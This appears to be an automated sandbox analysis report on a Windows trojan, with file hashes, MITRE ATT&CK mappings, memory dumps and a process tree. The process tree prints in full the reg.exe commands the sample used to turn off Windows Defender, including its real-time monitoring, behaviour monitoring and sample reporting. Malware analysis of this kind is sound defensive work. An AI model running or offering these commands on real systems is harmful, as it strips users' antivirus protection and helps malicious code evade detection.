d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf

General

Target

d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe
Size

90KB
MD5

85340d7bc64e23ba2c61f9612c369148
SHA1

38e2ada88a258f16391b6d2ec2e1ff462b2e8fd3
SHA256

d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf
SHA512

48806f8afa726c200a26fc7c8235e542b63e2026b2f88df8508caee25681ea5e415e22982ee45ebb147c0166be34d407c3ced90b49e0719a1fd31a643b2a0e20

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.execmd.exe

description	pid	process	target process
PID 1876 wrote to memory of 2540	1876	d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe	cmd.exe
PID 1876 wrote to memory of 2540	1876	d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe	cmd.exe
PID 2540 wrote to memory of 2800	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2800	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2932	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2932	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2536	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2536	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 3272	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 3272	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1996	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 1996	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4568	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4568	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 3976	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 3976	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 5080	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 5080	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 3808	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 3808	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4404	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4404	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4512	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4512	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4920	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 4920	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 8	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 8	2540	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe
"C:\Users\Admin\AppData\Local\Temp\d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D26.tmp\6D27.tmp\6D28.bat C:\Users\Admin\AppData\Local\Temp\d46ed35f935702fa48c8769ccd66883924c7905f5196f25169984dbd96afc9cf.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
3⤵
PID:2800

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:2932

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
3⤵
PID:3272

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:2536

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:1996

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
3⤵
PID:4568

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
3⤵
PID:3976

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:5080

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
3⤵
PID:3808

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
3⤵
PID:4404

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
3⤵
PID:4512

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
3⤵
PID:4920

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
3⤵
PID:8

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Disabling Security Tools

1

T1089

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6D26.tmp\6D27.tmp\6D28.bat
Filesize
1KB

MD5
509170ad1804d3092fa6c5cf530e017f

SHA1
3fb5b0dee2231ef6e7d0f71b6af5b298f109c2c4

SHA256
7a1f7876c4cdbc2010f08f143347f6c037c558ff57a3209cb5a56644e385280d

SHA512
ef12b29934cb19fe87e7014f6cbd22e23c1b77f3841ecd06b980e72d6c067f9b1a32524b5985c70f1537cecbad8286a73925de3b87e396cf19bb6580e828ee58

Download Submit
memory/8-144-0x0000000000000000-mapping.dmp

Download
memory/1996-136-0x0000000000000000-mapping.dmp

Download
memory/2536-134-0x0000000000000000-mapping.dmp

Download
memory/2540-130-0x0000000000000000-mapping.dmp

Download
memory/2800-132-0x0000000000000000-mapping.dmp

Download
memory/2932-133-0x0000000000000000-mapping.dmp

Download
memory/3272-135-0x0000000000000000-mapping.dmp

Download
memory/3808-140-0x0000000000000000-mapping.dmp

Download
memory/3976-138-0x0000000000000000-mapping.dmp

Download
memory/4404-141-0x0000000000000000-mapping.dmp

Download
memory/4512-142-0x0000000000000000-mapping.dmp

Download
memory/4568-137-0x0000000000000000-mapping.dmp

Download
memory/4920-143-0x0000000000000000-mapping.dmp

Download
memory/5080-139-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing